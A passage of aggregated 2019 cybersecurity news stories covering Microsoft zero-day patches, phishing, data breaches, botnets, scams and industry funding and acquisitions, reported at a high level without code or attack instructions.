Jina said that there is a slight increase in CSRF issues in general, as fixing them appears to be much easier and often simply turning on such a defense (if available in a given framework and is usually a configuration change) will protect the entire application in one go, as opposed to having to go into the code and fix each instance.

“We find that explaining the underlying risk and cause of CSRF issues can be confusing to developers and is often misunderstood.”

Microsoft Fixes Four SandboxEscaper Zero-Days

Microsoft Fixes Four SandboxEscaper Zero-Days

Microsoft has released its latest monthly security updates and there are four fixes for zero-day threats published recently by SandboxEscaper.

In total Redmond fixed 88 vulnerabilities in this update round with 21 labelled critical.

The four zero-days are all elevation of privilege flaws which affected Windows: CVE-2019-1069 is a bug in the Windows Task Scheduler, CVE-2019-1064 is an elevation of privilege bug in Windows, CVE-2019-1053 is a vulnerability in Windows Shell which could allow elevation of privilege on the affected system by escaping a sandbox and CVE-2019-0973 is a flaw in Windows Installer.

The recently disclosed BlueKeep vulnerability (CVE-2019-0708) in RDP should also be a priority for system admins, after Microsoft warned that it could be “wormable” — that is, exploitable without the need for user interaction.

However, patching is just one part of the defense-in-depth approach IT security teams need to take, according to Ivanti director of security solutions, Chris Goettl.

“Currently around 1.6 million public facing RDP servers are under the attack of a botnet called GoldBrute. Instead of exploiting a vulnerability, GoldBrute is attacking weak passwords. A couple of things to assess in your environment: do you have public facing RDP services exposed? Have you assessed its configuration?” he explained.

“Ideally, blocking RDP at the perimeter is best. Restricting access to a VPN controls the exposure of RDP more. Enabling network-level authentication can help mitigate BlueKeep. Ensure any credentials available over RDP have strong passwords that are changed regularly.”

Elsewhere, there’s one critical update for Flash Player this month, fixing a bug (CVE-2019-7845) which could allow arbitrary code execution on a victim’s machine. Adobe also announced patches for three critical ColdFusion vulnerabilities and seven Adobe Campaign bugs, one of which is critical.

FBI: Don’t Trust HTTPS or Padlock on Websites

FBI: Don’t Trust HTTPS or Padlock on Websites

The FBI has been forced to issue an alert warning users that the sight of "HTTPS" and a padlock icon in the address bar may not be enough to prove the authenticity of a website.

The latest Public Service Announcement from the bureau’s public-facing Internet Crime Complaint Center (IC3) revealed that cyber-criminals are increasingly abusing trust in TLS-secured websites to improve the success rate of phishing attacks.

“They are more frequently incorporating website certificates — third-party verification that a site is secure — when they send potential victims emails that imitate trustworthy companies or email contacts,” it warned.

“These phishing schemes are used to acquire sensitive logins or other information by luring them to a malicious website that looks secure.”

Corin Imai, senior security adviser at DomainTools, argued that the falling price of SSL-TSL certificates make it a no-brainer for malicious webmasters.

“Thankfully, education is the single security measure against which criminals can’t work around: an aware user, who has been trained to look for misspellings in the URL of a web page and knows not to trust a padlock icon, is much harder to lure into giving away personal information or clicking on malware-spreading links,” she added.

“Organizations should therefore invest in solid training programs, which cannot be limited to a one-day workshop on what a phishing scam looks like, but need to be continuous, thorough and impactful.”

To that end, the FBI urged users to go back to basics, by not clicking on links in any suspicious-looking emails and to follow-up with the sender directly even if the contact is known.

Hackers are also hosting malware on cloud services such as Azure and benefiting from their HTTPS certificates indirectly this way, experts have revealed.

Code Signing Shortcomings Leave Gaps for Hackers

Code Signing Shortcomings Leave Gaps for Hackers

Only a little over a quarter (28%) of global organizations have a clearly defined security process in place for code signing, potentially opening the door for hackers to steal and use these certificates in attacks, according to new Venafi research.

The security vendor polled 320 security professionals in the US, Canada and Europe to better understand the risks posed by code signing — the process used to secure software updates.

Although half said they were concerned that cyber-criminals are using forged or stolen code signing certificates to breach organizations, few enforce security policies at this layer. The figure for European respondents was even lower than the overall average, at just 14%.

What’s more, over a third (35%) admitted that they don’t have a clear owner for the private keys used in code signing.

The challenge is likely to become even more acute going forward, with 69% of firms saying they plan to increase usage of code signing in the coming year, according to Venafi.

The vendor’s vice-president of security strategy and threat intelligence, Kevin Bocek, argued that code signing certificates enabled both the notorious Stuxnet and ShadowHammer attacks to succeed.

“Security teams and developers look at code signing security in radically different ways. Developers are primarily concerned about being slowed down because of their security teams’ methods and requirements. This disconnect often creates a chaotic situation that allows attackers to steal keys and certificates,” he added.

“In order to protect themselves and their customers, organizations need a clear understanding of where code signing is being used, control over how and when code signing is allowed, and integrations between code signing and development build systems. This comprehensive approach is the only way to substantially reduce risk while delivering the speed and innovation that developers and businesses need today.”

Radiohead Officially Releases Music Stolen in Hack

Radiohead Officially Releases Music Stolen in Hack

A week after receiving a ransom request for $150,000, alternative-rock band Radiohead decided to go live with the 18 hours of stolen music that was never intended for public consumption.

On June 5, Consequence of Sound reported that 18 hours of Radiohead’s music was leaked online. The band announced on June 11 that it has officially released the leaked material through Bandcamp and is donating the proceeds to the climate activist group Extinction Rebellion.

Band member Jonny Greenwood tweeted that a hacker stole minidisk archives of the band’s OK Computer sessions.

We got hacked last week - someone stole Thom’s minidisk archive from around the time of OK Computer, and reportedly demanded $150,000 on threat of releasing it.

So instead of complaining – much – or ignoring it, we’re releasing all 18 hours on Bandcamp in aid of Extinction Rebellion. Just for the next 18 days. So for £18 you can find out if we should have paid that ransom.

Never intended for public consumption (though some clips did reach the cassette in the OK Computer reissue) it’s only tangentially interesting. And very, very long. Not a phone download. Rainy out, isn’t it though?


“Hackers holding data hostage is a growing concern for businesses as hackers have found out that crime does pay and people are willing to pay to regain control of their own data," said Matan Or-El, CEO of Panorays. "In their efforts to stop the hacker’s booming business, the FBI and industry experts strongly recommend to never to pay the ransom.

"Radiohead has taken an additional route – a creative one – to defeat hackers. Their method levels the playing field by beating hackers in their own game and simply releasing their album to the public.”

SOCs Struggle with Staffing, Reporting and Visibility

SOCs Struggle with Staffing, Reporting and Visibility

Staffing remains an issue for security operations centers (SOCs), which continue to struggle with reporting and documentation while barely being able to stay afloat in a sea of alerts and false positives, according to the annual State of the SOC report from Exabeam.

The report found approximately one-third of respondents said that their SOC was understaffed by 6–10 people. “Nearly 50% of understaffed SOCs indicated they don’t have sufficient funding for technology, while respondents of larger SOCs said that despite recent or increased funding for technology, they recommend continued investment in newer, more modern technologies (39%),” the press release said.

In addition, shifting roles and responsibilities is a top challenge for SOC managers, with C-suite executives taking on the tasks of incident response and threat hunting, while frontline employees are completing fewer operational tasks.

Only 5% of respondents said they see all of the events in the security incident and event management (SIEM) system. Not having full visibility into events is a handicap for SOC managers, who reported that a lack of visibility leaves them more likely to miss security alerts. Because legacy applications are unable to log events, 39% of SOC personnel reported security alerts as the largest pain point that leaves the organization more vulnerable to cyber-attacks.

“There’s an idiom, ‘what you don’t know can’t hurt you.’ But in the information security business, that couldn’t be further from the truth. In fact, it’s what you don’t know – or worse, can’t see – that will significantly harm your business,” said Steve Moore, chief security strategist at Exabeam. “From our survey, an example of how this can manifest is general lack of environmental visibility in the form of too few logs – you can’t protect what you can’t see. Visibility, event context and automation play a key role in building relevant defense, so you can have a fighting chance against even the most sophisticated adversaries.”

Increasingly, SOC managers are placing greater value on soft skills, like communication, with 65% of respondents saying personal and social skills play a critical role in the success of a SOC. In addition, the report found that hard skills, such as threat hunting and data loss prevention, have also increased in importance. Open to Acquisition Open to Acquisition

Since its inception in 2013, the website (HIBP) has grown exponentially – to the point where it is no longer feasible for one person to maintain, which is why Troy Hunt, the site’s creator, today announced that he is open to the possibility of an acquisition.

The prevalence of breaches, combined with the analysis he was doing and the scale of Adobe, is what sparked the idea for HIBP, Hunt said. “I wonder how many people know? Do they realize they were breached? Do they realize how many times they were breached? And perhaps most importantly, have they changed their password (yes, almost always singular) across the other services they use? And so Have I Been Pwned was born.”

In an exclusive interview with Infosecurity, Hunt joked that he has often been asked, "What would happen to the site if he were hit by a bus? ... Microsoft has my credit card, so the site would continue, but who would manage it?” Hunt said.

Fans of the site have applauded Hunt for “doing God’s work,” but the man is indeed a mere mortal. “It’s gotten to the point where the service has become enormously popular and the effort required to maintain it is exceeding my time availability,” Hunt said. “It’s also making it clear that there is a lot more to be done than I’m able to do on my own. There needs to be a better continuity plan than just one person doing this in their spare time.”

With 8 billion breached records included in its database, the site has nearly 3 million subscribers. “I’ve emailed those folks about a breach 7 million times, there are 120,000 people monitoring domains they’ve done 230,000 searches for and I’ve emailed them another 1.1 million times. There are 150,000 unique visitors to the site on a normal day, 10 million on an abnormal day, another couple of million API hits to the breach API and then 10 million a day to Pwned Passwords.”

Though there is no one organization Hunt is eyeing for acquisition, he did say that he will continue to be involved in the future of HIBP. “There's a heap of things I want to do with HIBP which I simply couldn't do on my own. This is a project with enormous potential beyond what it's already achieved and I want to be the guy driving that forward,” Hunt wrote.

FTSE 250+ Demonstrate Weak Security, but Low SMB Exposure

FTSE 250+ Demonstrate Weak Security, but Low SMB Exposure

FTSE 250+ organizations leave an average of 35 servers and devices exposed to the open internet, while 231 have “weak or non-existent” phishing defenses.

According to research by Rapid7, many companies in the FTSE 250+ indicate how many and which cloud service providers they use in their DNS metadata. The research found that 114 organizations use between two and seven cloud service providers. 

Tod Beardsley, director of research at Rapid7, told Infosecurity that this is the “best of the best of IT in Britain” and what stood out to him was the number of services exposed, and this was in the 30% range, however some companies expose thousands and others only a few.

He said: “We look at each company and ask how many versions of iOS or nginx are they running, or how many versions of Apache? Do they standardize on one version, which every company wants to do because it makes things a lot easier with a lot less overheads, or are they running 20 different versions of Apache, which tells me they have a really fragmented asset management processes and are not doing patches, and doing black box stuff .”

One “bright side” that Beardsley pointed out for the UK was fewer SMB servers, with only seven found in total.

Of the average 35 exposed services, Beardsley admitted that if he were managing a company’s IT and only found 35, he would be delighted as “it sounds really good” as when you get to 300-400 it becomes a full time job.

Elsewhere, 19% of the FTSE 250+ organizations are not enforcing SSL/TLS security. Beardsley said that there is a lack of 302 redirects from HTTP to HTTPS, and “a lot of clear text HTTP as the front page” for household brands. He admitted that for a country so determined to get him to accept cookies, this was surprising as it permitted injection attacks as well as Man-in-the-Middle attacks.

Asked if he felt whether this puts the FTSE 250+ in a positive light, Beardsley said that there is work to be done, and while the SMB and Telnet stats are a good thing, Rapid7 is seeing connections from FTSE 250+ companies to its honeypot “as if we are part of the same network so it is accidental self-compromise.”

Welsh Man Gets Four Years for TalkTalk Attack

Welsh Man Gets Four Years for TalkTalk Attack

A Welsh man diagnosed with Asperger’s syndrome has been sentenced to four years behind bars for his role in a cyber-attack on TalkTalk which cost the company £77m.

Daniel Kelley, 22, from Llanelli, Carmarthenshire, will spend his sentence in a young offender institute after first pleading guilty to 11 offenses back in 2016.

These included: hacking the ISP and attempting to blackmail CEO Dido Harding and other executives, as well as “hacking his local college, encouraging and assisting hacking, possessing and offering to supply TalkTalk customer and other data and converting proceeds of blackmail from an Australian victim,” according to the Met Police.

“Kelley’s computers revealed from 2013 to 2015 that he had embarked on a cybercrime campaign hacking and blackmailing individuals and companies, attempting to sell compromised personal data online and committing cyber-attacks on infrastructure,” the London police force said.

“Over the three-year period, Kelley demanded over 753 Bitcoins valued at more than £123,700 successfully extorting £4400 in Bitcoins and attempted to conceal, convert and launder Bitcoins into cash. He had attempted to anonymize and conceal his identity and activities online using technology. As a result a significant amount of additional cybercrime offenses were identified and investigated by the Met.”

According to reports, Kelley turned to cybercrime after failing to get the grades he needed to get onto a computer course.

Kelley is just one of several people arrested following the 2015 attack on TalkTalk which led to the compromise of data on over 100,000 customers.

Another was a 17-year-old at the time, who admitted he hacked the firm to show off to friends.

The young age of the offenders is another indication that efforts are failing to get talented children to use their computing skills for positive ends.

At Infosecurity Europe last week, HaveIBeenPwned founder Troy Hunt urged: “We’ve got to do more to set kids back on the right path.”

US Customs Contractor Hack Breaches Traveller Images

US Customs Contractor Hack Breaches Traveller Images

US Customs and Border Protection (CBP) has admitted a data breach at a sub-contractor has compromised images of individuals and vehicles entering and leaving the country.

The controversial agency first learned of the “malicious cyber-attack” on May 31.

“CBP learned that a subcontractor, in violation of CBP policies and without CBP’s authorization or knowledge, had transferred copies of license plate images and traveler images collected by CBP to the subcontractor’s company network,” it said in a statement.

“Initial information indicates that the subcontractor violated mandatory security and privacy protocols outlined in their contract.”

According to the agency, none of the stolen data has yet been spotted on the dark web, although it may be being traded on closed forums.

It’s believed that it covers tens of thousands of travellers for a period of over a month.

The name of the contractor is officially not being made public, although there are suggestions that it could be Perceptics, a firm that supplier license plate reading services for the government.

Robert Cattanach, a partner at the international law firm Dorsey & Whitney, argued that consumer rights in this area are limited, despite a new Californian privacy law designed to strengthen them (CCPA).

“Unless a traveler can prove that they have been harmed somehow by the disclosure of their information and location at a border or airport there is very little anyone can do once their information has been stolen, and then often made available on the dark web. US Courts have been reluctant to award damages absent a showing of specific and concrete harm,” he argued.

“The CCPA does not apply to the US government, and more robust federal privacy protections have been repeatedly stalled in Congress. Rapidly evolving technology that collects vast amounts of individual data, coupled with the dramatic cultural differences between various countries that collect it, make this an even more challenging problem for individuals and their political systems to reconcile.”

Chinese Uni Exposes 8TB+ of Email Metadata

Chinese Uni Exposes 8TB+ of Email Metadata

A prestigious Chinese university leaked over 8TB of email metadata via an unsecured Elasticsearch database, a researcher has revealed.

Cloudflare director, Justin Paine, discovered the database, which had no authentication, on May 22 after a simple Shodan search.

In total, there were 9.5 billion rows, which equated to 8.4TB of metadata from the popular open source Zimbra email platform. Although the database didn’t contain the subject line or body text of emails, it revealed a significant amount of detail, according to Paine.

“Based on the metadata I was able to locate all email being sent or received by a specific person. This data also included the IP address and user agent of the person checking their email. As such, I could locate all the IPs used and device type of a specific person,” he explained.

“Using this metadata I could see the high level details of a specific email exchange such as which email address was sending or receiving an email from a different email address.”

The data in question came from Shanghai Jiao Tong University, described online as the “MIT of the East,” with over 41,000 students. However, it acted promptly to secure the data once notified, Paine said.

He added that no students appeared to have had their data exposed in the leak.

The discovery is just the latest instance of a major privacy leak via an unprotected Elasticsearch database.

Back in November 2018, the personal information of nearly 82 million Americans was exposed online for at least two weeks after a similar find.

There was another spate of incidents in January this year, exposing millions more records belonging to banks, casinos and non-profits.

According to Elastic, the company behind Elasticsearch, these reports usually indicate that an individual or organization has “actively configured their installations to allow unauthorized and authenticated users to access their data over the internet.”

Criminals Try to Schedule Spam in Google Calendar

Criminals Try to Schedule Spam in Google Calendar

A sophisticated scam is targeting Gmail users through fraudulent, unsolicited Google Calendar notifications as well as through other Google services, including Photos and Forms, according to Kaspersky.

In these scams, criminals are exploiting Gmail calendar’s default feature that automatically adds calendar invitations and notifications.

Cyber-criminals reportedly send targets an unsolicited calendar invitation with a malicious link to a phishing URL. A pop-up notification of the invitation appears on the smartphone’s screen, where the recipient is tempted to click on the link. However, the website to which they are delivered asks victims to enter their credit card details and add some personal information – which is sent straight to the scammers.

“The ‘calendar scam’ is a very effective scheme, as most people have become used to receiving spam messages from emails or messenger apps,” said Maria Vergelis, security researcher at Kaspersky, in a press release.

“But this may not be the case when it comes to the Calendar app, which has a main purpose to organize information rather than transfer it. So far, the sample we’ve seen contains text displaying an obviously weird offer, but as it happens, every simple scheme becomes more elaborate and trickier with time. The good news is that it’s fairly easy to avoid such a scam – the feature that enables it can be easily turned off in the calendar settings.”

Kaspersky advised that turning off the auto-add feature will help to prevent falling victim to the scam. “To do so, open Google Calendar, click the settings Gear Icon, then on Event Settings. For the ‘automatically add invitations’ option, click on the drop-down menu and select ‘No, only show invitations to which I've responded’. Below this, in the View Options section, make sure ‘Show declined events’ is NOT checked, unless you specifically wish to view these,” today’s press release said.

In addition to the Calendar service, scammers are also leveraging Google Photos, sending pictures that detail a large remittance that the recipient can receive if they reply to the email address supplied in the message.

“A photo of a nonexistent check should immediately betray the scammers’ intentions. The check states that some commission fee will unlock a much larger amount. After the victim pays up, the scammers simply vanish into the ether,” researchers wrote.

Data of 1m Users Lost in EmuParadise Breach

Data of 1m Users Lost in EmuParadise Breach

Community members have taken to social media to share the news that the accounts of more than 1 million gamers were reportedly leaked after EmuParadise suffered a data breach, according to multiple reports. 

Some of those impacted by the data breach of the retro gaming site, which used to host ROM, said that over the weekend, they started receiving notices that their accounts had been compromised in a data breach.

“The retro gaming website EmuPardise was breached in April 2018. The vBulletin forum exposed 1.1m email addresses, IP address, usernames and passwords stored as salted MD5 hashes. 71% of addresses were already in @haveibeenpwned,” tweeted.

The site boasts “a huge community, a vast collection of gaming music, game related videos (movies, fmvs, etc.), game guides, magazines, comics, video game translations and much much more!” Infosecurity has contacted EmuParadise and will update if the company responds.

“We know even less about this breach than most. We know the source of the database, and the fact that it exists, but there are no details about how the incident occurred,” said Tim Erlin, vice president of product management and strategy at Tripwire. "It’s been well understood that MD5 is insecure for more than a decade, and its weaknesses have been actively exploited. Despite these known issues, MD5 has persisted for a long time.”

“It would be extremely rare to see new applications making use of MD5 for secure hashing. The problem is that there are so many legacy systems out there, following the modernized adage ‘if it ain’t down, don’t touch it.’ Until these applications are replaced, or the underlying infrastructure stops supporting MD5, we’ll continue to see this type of persistence.”


Vectra Raises $100m in Series E Funding

Vectra Raises $100m in Series E Funding

After having experienced 104% growth in annual recurring revenue in 2018 over 2017, Vectra has today announced that it closed a $100 million funding round led by TCV, bringing the company’s total funding to date to more than $200 million, according to a June 10 press release.

The triple digit Series E funding, in which existing investors also participated, comes only one year after Vectra raised $36 million in Series D funding. The financing is expected to drive the company's growth and market expansion in what is estimated at a $12.7 billion cloud security market, according to Forrester Research.  

While critical security gaps leave organizations vulnerable, consumers continue to use online services for everything from entertainment to banking. Securing consumer data and preserving their privacy is critical to maintaining trust and preserving an organization’s reputation, a Vectra spokesperson said. The business impact of lost revenue and shareholder value as a result of consumer data breaches in the cloud are significant and are therefore making cloud security a board level priority.

“TCV has an extensive track record of partnering with enterprise security companies, including Rapid7 and Splunk, from growth stage to public,” said Tim McAdam, general partner at TCV and member of the Vectra board of directors. “In our research on the category, it became clear to us that Vectra was rapidly gaining momentum with customers by rethinking the way enterprises view both network and cloud security. The Vectra Cognito platform is poised to become requisite in the security infrastructure of multinational enterprises and midsize businesses alike.”

“The cloud has inherent security blind spots, making it imperative to eliminate cyber-risks as enterprises move their business to the cloud,” said Hitesh Sheth, president and chief executive officer at Vectra. “The Cognito platform enables them to stop hidden cyber-attacks in the cloud. We look forward to partnering with TCV and our existing investors as we continue our rapid growth.”

UK Taxpayers Overwhelmed with Phishing Scams

UK Taxpayers Overwhelmed with Phishing Scams

HMRC has received over 2.6m reports of phishing attempts over the past three financial years, according to a new Freedom of Information (FOI) request from a think tank.

The tax office processed a total of 2,602,528 reports of phishing emails and texts as well as phone scams from 2016-19, according to Parliament Street. Although the worst year was 2016-17 (921,900), 2018-19 saw an increase of 15% over the previous year to reach 897,649.

The largest number were fraudulent emails spoofing tax rebate messages, which accounted for 1,957,003 reports over the three years. The worst year for these was 2016-17, accounting for 733,980.

Next came scam SMS messages, which accounted for 150,009 over the past three financial years — although the volume of these has dropped by almost half between 2016-17 and 2018-19, according to the report.

The number of phone scams reported to the tax office has soared alarmingly over the period: from just 407 in 2016/17, to 104,774 reports in 2018/19.

The number of taxpayers who admitted disclosing financial details to the phishers was 10,647 in 2016-17, but then dropped considerably in the succeeding years, to total 18,792 for the three years. That equates to a success rate of less than 1%.

Also reassuring is the number of phishing websites being reported for removal: 50,323 over the three years, with 2017/18 being the worst year with 19,198 reports.

The HMRC is said to be the government’s most abused ‘brand’ but it has been getting better at combating the fraudsters, having implemented DMARC in 2016, for example. This has helped the agency block hundreds of millions of phishing emails, while a Customer Protection Team works hard to follow-up reports from taxpayers to take down phishing sites.

However, the wider business community may be less well protected, according to Centrify VP, Andy Heather.

“These incidents are just a snapshot of techniques used by hackers to gain confidential financial information as well as credentials and passwords. In many cases we’re seeing fraudsters gaining access to company data, using legitimate user ID and log-in details, without raising suspicion,” he argued.

“For businesses, it’s time to face the reality that cyber-attackers now no longer hack in, they log in using credentials and passwords that are weak, stolen or in cases of phishing are simply handed over to them. Tackling this problem means adopting a zero-trust approach to all user-accounts, ensuring every employee who tries to access critical information is screened with the necessary password, location and authentication procedures to ensure they are who they say they are.”

Microsoft Warns of Campaign Exploiting 2017 Bug

Microsoft Warns of Campaign Exploiting 2017 Bug

Microsoft has alerted users to a new campaign utilizing a vulnerability which was discovered and patched back in 2017 to download a backdoor Trojan to victim machines.

Spam emails have been detected in various European languages carrying malicious RTF attachments which feature an exploit for CVE-2017-11882, the computing giant said in a series of tweets on Friday.

“The CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks. Notably, we saw increased activity in the past few weeks. We strongly recommend applying security updates,” it said.

“In the new campaign, the RTF file downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload. The backdoor payload then tries to connect to a malicious domain that’s currently down.”

Although the domain in question is currently out-of-service, hackers may in the future update the attack to connect to a working C&C domain. This could enable the download of additional payloads, leading to infection with ransomware or banking Trojans, information-theft and more.

“Office 365 ATP detects the emails and attachments used in this campaign. Windows Defender ATP detects the documents as Exploit:O97M/CVE-2017-11882.AD and the payload as Trojan:MSIL/Cretasker,” Redmond’s security team concluded.

“Other mitigations, like attack surface reduction rules, also block the exploit.”

The software flaw in question, which exists in Microsoft Office’s Equation Editor, has been incredibly popular since it was discovered a couple of years ago as it requires no user interaction to work.

It was used by APT34, an Iranian cyber espionage group, and just last week was spotted in attacks on central government targets delivering the Hawkball backdoor. It’s also been used to spread the infamous Cobalt malware and a RAT which uses the popular Telegram Messenger app for its command and control (C&C).

GoldBrute Campaign Brute Forces 1.6m RDP Servers

GoldBrute Campaign Brute Forces 1.6m RDP Servers

Researchers have uncovered a large brute forcing campaign targeting upwards of 1.5 million remote desktop protocol (RDP) servers.

Renato Marinho, chief research officer at Morphus Labs, revealed the so-called “GoldBrute” campaign is controlled by a single C&C server, with which bots are exchanging data via AES encrypted WebSocket connections to port 8333.

Infected hosts will first be given instructions to download the bot code: a large, 80MB including the complete Java Runtime.

“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot,” Marinho continued.

“Each bot will only try one particular username and password per target. This is possibly a strategy to fly under the radar of security tools as each authentication attempt comes from different addresses.”

Marinho claimed to have detected almost 1.6m targeted IP addresses from the C&C server — spread out across the world but located especially in Europe, the US and east Asia.

The news is a reminder that, despite the publicity around the Bluekeep RDP vulnerability, brute forcing is arguably a bigger threat today to administrators of these systems.

The NSA last week urged organizations to patch the remote code execution bug, CVE-2019-0708, warning that it could be wormable as it requires no human interaction to spread. Although exploitation has not yet been observed in the wild, it’s only a matter of time, experts claimed.

However, in the meantime, GoldBrute appears to be only just getting started.

“Shodan lists about 2.4 million exposed servers,” said Marinho. “GoldBrute uses its own list and is extending it as it continues to scan and grow.”

Sextortion Scammers Pose as Corrupt CIA Agents

Sextortion Scammers Pose as Corrupt CIA Agents

In a new sextortion scam, cyber-criminals are posing as corrupt officials of the CIA and demanding $10,000 from their targets whose names they claim to have found in an investigation into online pedophiles, according to Kaspersky Lab.

Victims reportedly receive an email authored by what appears to be a corrupt CIA agent involved in “a large international operation set to arrest over 2,000 people suspected of pedophilia, in over 27 countries.”

The scope of the information the department reportedly has includes the victim’s name, phone number, and email, along with the person's home and work addresses. The scammer also claims that the CIA has information about relatives, which was reportedly obtained from a range of sources, including ISP, online chats and social networks, researchers said.

The note alleges that the victim’s contact details and those of their relatives are being held as part of the operation identified as case #45361978 (relating to possession and distribution of child pornography, or so it seems).

Credit: Kaspersky
Credit: Kaspersky

The fake agent offers to remove all files relating to the victim in return for a payment of $10,000 in cryptocurrency, but time is of the essence, as the letter also notes that arrests will begin in two weeks' time. As a result, the sextortion payment needs to be received in nine days of receiving the letter.

“Compared with regular sextortion spam, the 'CIA' message is well-written, with grammatically correct, stylistically restrained language in a quite official-sounding tone. The scammers also took care of the layout: The message text is nicely formatted and easy to read, and the effect is amplified by the CIA emblem staring out from the screen,” researchers wrote.

“However, just because the message looks more imposing doesn’t make it more true. Don’t be offended, but the CIA is unlikely to give a hoot about you. The scammers most likely found your email address in a database leaked online, or even just came across it by chance.”

Kaspersky recommends trashy any messages immediately. “Our number one tip is don’t panic,” the researchers said. Beyond that, they advised that victims do not reply to the email and never consider paying a ransom to scammers.

New Adware Found in 200+ Google Play Apps

New Adware Found in 200+ Google Play Apps

A new adware known as BeiTaAD was found embedded in 238 applications in the official Google Play store and have been installed by 440 million Android users, according to security researcher Kristina Balaam of Lookout.

“BeiTaAd is a well-obfuscated advertising plug-in hidden within a number of popular applications in Google Play. The plug-in forcibly displays ads on the user’s lock screen, triggers video and audio advertisements even while the phone is asleep and displays out-of-app ads that interfere with a user’s interaction with other applications on their device,” Balaam wrote.

The ads displayed, which become visible at least 24 hours after the application is launched, are so pervasive that users impacted by the adware have reportedly been unable to answer calls or interact with other apps. Balaam said that on one of the Lookout test devices, the out-of-app ads did not appear until two weeks after the application, Smart Scan (, was launched.

“There is a very fine – and, one could argue, diminishing – line between adware and malware. They exhibit similar behaviors for disseminating content and techniques for avoiding detection and analysis,” said Usman Rahim, digital security and operations manager for The Media Trust.

“Adware can also be vulnerable, as there is little to no incentive for developers to patch up the flaws, and can leak data. In the wrong hands, adware plug-ins can be used to distribute malicious code to commit theft and fraud on millions of users. Companies that monetize their apps by featuring ads must thoroughly vet their vendors and continuously monitor what these vendors do to users. The temptation for vendors to exploit access to users is great and can put developers at odds with current and forthcoming privacy regulations.”

Entrust Datacard Closes on Thales’ nCipher Security

Entrust Datacard Closes on Thales' nCipher Security

Entrust Datacard announced today that it has completed its acquisition of Thales’ General Purpose Hardware Security Module (GP HSM) business, nCipher Security.

With this acquisition Entrust Datacard enhances its existing public key infrastucture (PKI) and SSL offerings, which the company says positions itself to effectively secure customers’ sensitive information and business critical applications with the implementation of new digital initiatives, particularly those solutions using general purpose HSMs.

The hope is to better protect blockchain, crypto wallets and internet of things (IoT) manufacturing – some of the most vulnerable aspects of emerging business applications – and to help customers achieve compliance with stringent regulatory requirements such as the General Data Protection Regulation (GDPR) and electronic identification and trust services (eIDAS).

“We are extremely pleased to complete this acquisition and bring nCipher’s exceptional talent and technology into the Entrust Datacard portfolio,” said Todd Wilkinson, president and CEO of Entrust Datacard, in a press release.

“The need for secure network access and data integrity continues to multiply – from mobile devices and cloud services to connected IoT devices and digital payments. The use of HSMs is expanding across all of these domains. With nCipher now part of our solution portfolio, customers will see benefit from our expanded offerings for the most sensitive, high assurance use cases.”

For nCipher, the deal brings 300 employees in as part of the Entrust Datacard team and expands its authentication and cloud capabilities, and allows it to offer advanced solutions from Entrust Datacard’s secure hosting facilities. “nCipher is excited to join the talented Entrust Datacard team. This acquisition quickly expands the global footprint for nCipher solutions and accelerates our strategy for ‘as-a-service’ offerings,” said Cindy Provin, CEO of nCipher Security.

“HSMs provide a foundation of trust for business applications such as PKI, blockchain, mobile payments and code signing. As a single company, Entrust Datacard is positioned to effectively secure our customers’ sensitive information and business critical applications as they implement new digital initiatives.”

Researchers Find 40,000+ Containers Exposed Online

Researchers Find 40,000+ Containers Exposed Online

Researchers have discovered over 40,000 Kubernetes and Docker container hosting devices exposed to the public internet through misconfigurations.

Palo Alto Networks’ Unit 42 revealed the results of its latest research in a blog post yesterday. The discovery was made via a simple Shodan search.

Some 23,353 Kubernetes containers were found in this way, located mainly in the US, as well as Ireland, Germany, Singapore, and Australia. Even more (23,354) misconfigured Docker containers were discovered exposed to the internet, mainly in China, the US, Germany, Hong Kong and France.

“This does not necessarily mean that each of these 40,000+ platforms are vulnerable to exploits or even the leakage of sensitive data: it simply highlights that seemingly basic misconfiguration practices exist and can make organizations targets for further compromising events,” explained senior threat researcher, Nathaniel Quist.

“Seemingly simple misconfigurations within cloud services can lead to severe impacts on organizations.”

This has happened several times in the past: attackers exploited weak security configurations to steal keys and tokens for 190,000 Docker Hub accounts, while poor container security also led to a major breach of 13 million user records at Ladders.

Digging down into the exposed containers they found, the Palo Alto researchers discovered unprotected databases, in one case exposing multiple email addresses.

“Misconfigurations such as using default container names and leaving default service ports exposed to the public leave organizations vulnerable to targeted reconnaissance,” Quist concluded.

“Using the proper network policies, or firewalls can prevent internal resources from being exposed to the public internet. Additionally, investing in cloud security tools can alert organizations to risks within their current cloud infrastructure.”

Some 60% of US organizations experienced security incidents related to their use of containers over the previous year, according to research from Tripwire released in January.

GateHub Users Lose $9.7m to Hackers

GateHub Users Lose $9.7m to Hackers

Two cryptocurrency firms have come under attack over recent days with users of one, GateHub, suffering losses estimated at nearly $9.7m.

The cryptocurrency wallet service provider sounded the alarm in a statement on Thursday, claiming an investigation had been started after around 100 XRP Ledger wallets were compromised. The firm urged users to transfer their funds from these to a hosted wallet.

An XRP security community revealed in a separate post that, as of Wednesday, 23.2m XRP (Ripple) coins had been stolen, of which 13.1m had already been laundered.

However, the cause of the attack remains a mystery.

“API requests to the victim’s accounts were all authorized with a valid access token. There were no suspicious logins detected, nor there were any signs of brute forcing. We have however detected an increased amount of API calls (with valid access tokens) coming from a small number of IP addresses which might be how the perpetrator gained access to encrypted secret keys,” said GateHub.

“That, however, still doesn’t explain how the perpetrator was able to gain other required information needed to decrypt the secret keys. All access tokens were disabled on June 1 after which the suspicious API calls were stopped.”

The news comes as a separate digital currency platform managed to prevent a major theft of currency with some quick thinking.

Blockchain startup Komodo revealed it discovered an attack targeting its Agama wallet application. Hackers had uploaded malware to a supply chain provider’s software designed to steal cryptocurrency wallet seeds and other login passphrases.

“After discovering the vulnerability, our cybersecurity team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk,” Komodo said. “We were able to sweep around 8m KMD ($12.5m) and 96 BTC ($765K) from these vulnerable wallets, which otherwise would have been easy pickings for the attacker.”

Regulator Slams Cathay Pacific Over Breach

Regulator Slams Cathay Pacific Over Breach

Two separate groups breached Cathay Pacific’s cyber-defenses over a four-year period, taking advantage of multiple failures in IT security, a damning new report from the Hong Kong privacy commissioner has found.

The first incident occurred in October 2014 when keylogging malware was placed on an internal system to harvest account credentials. The group used these to access Cathay’s IT system via a VPN to steal data, whilst also moving laterally to extract domain credentials from other parts of the network. This activity continued until 2018.

